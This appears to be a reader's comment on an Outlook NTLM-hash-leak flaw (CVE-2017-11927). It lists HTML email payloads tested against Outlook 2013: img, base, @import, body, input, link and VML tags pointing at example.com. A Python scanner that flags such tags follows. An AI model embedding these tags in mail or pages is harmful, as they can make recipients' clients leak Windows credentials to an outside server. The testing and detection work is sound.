You are saying:
According to MSRC, the CVE-2017-11927 [2] (that was not released initially as a result of our report) had rectified some of the payloads. This patch was updated in May 2018 to address the remaining issues that were included in this report.
So I tried with a 3-year-old unpatched Outlook 2013, using these tags in an email:
Image tag:
<img src="//example.com/anon/test.txt" >
Base tag + image tag:
<base href="//example.com/IDontExist/">
<img>
Style tag:
<style>
@import 'its:/example.com/foo1/test';
@import url(its:/example.com/foo2/test);
</style>
Body tag (Image):
<body background="its:/example.com/IDontExistNew/foobar">
Input tag (Image):
<input type="image" src="its:/example.com/IDontExistNew/foobar" name="test" value="test">
Link tag (Style):
<link rel="stylesheet" href="its:/example.com/IDontExistNew/foobar" />
VML tag (Image):
<v:background xmlns:v="urn:schemas-microsoft-com:vml">
<v:fill src="its:/example.com/IDontExistNew/foobar" />
</v:background>
None of them are sending NTLM hashes over public; they just seem to work on LAN only.
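
As an added example (not part of the comment above or of the original report), here is a defender-side check that parses an HTML mail body and flags the resource-loading tags listed above when their URL is protocol-relative or uses a scheme outside an allow-list. The allow-list, the function and class names, and the sample input are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

# Tag -> attributes that trigger a resource fetch (the tags listed in the comment above).
FETCH_ATTRS = {"img": ("src",), "input": ("src",), "body": ("background",),
               "link": ("href",), "base": ("href",), "v:fill": ("src",)}
CSS_IMPORT = re.compile(r"@import\s+(?:url\(\s*)?['\"]?([^'\"\s);]+)", re.I)
SAFE_SCHEMES = ("http:", "https:", "cid:", "data:")  # assumption: local allow-list
# Constructed sample: two payload shapes from the list plus an ordinary https image.
SAMPLE = ('<img src="//example.com/anon/test.txt">'
          '<style>@import url(its:/example.com/foo2/test);</style>'
          '<img src="https://example.com/logo.png">')

def is_suspicious(url):
    # Protocol-relative (or UNC-style) URLs and any scheme outside the allow-list.
    url = url.strip().lower()
    if url.startswith(("//", "\\\\")):
        return True
    scheme = re.match(r"[a-z][a-z0-9+.-]*:", url)
    return bool(scheme) and scheme.group(0) not in SAFE_SCHEMES

class RemoteRefScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # (tag, attribute or "@import", url)
        self._in_style = False

    def handle_starttag(self, tag, attrs):
        self._in_style = tag == "style"
        for name, value in attrs:
            if name in FETCH_ATTRS.get(tag, ()) and value and is_suspicious(value):
                self.findings.append((tag, name, value))

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        if self._in_style:  # CSS text inside <style> ... </style>
            for url in CSS_IMPORT.findall(data):
                if is_suspicious(url):
                    self.findings.append(("style", "@import", url))

def scan(html):
    scanner = RemoteRefScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings
```

Calling `scan(SAMPLE)` returns the two flagged references and skips the ordinary https image; a relative URL is not flagged on its own, but the `<base>` tag that would redirect it is.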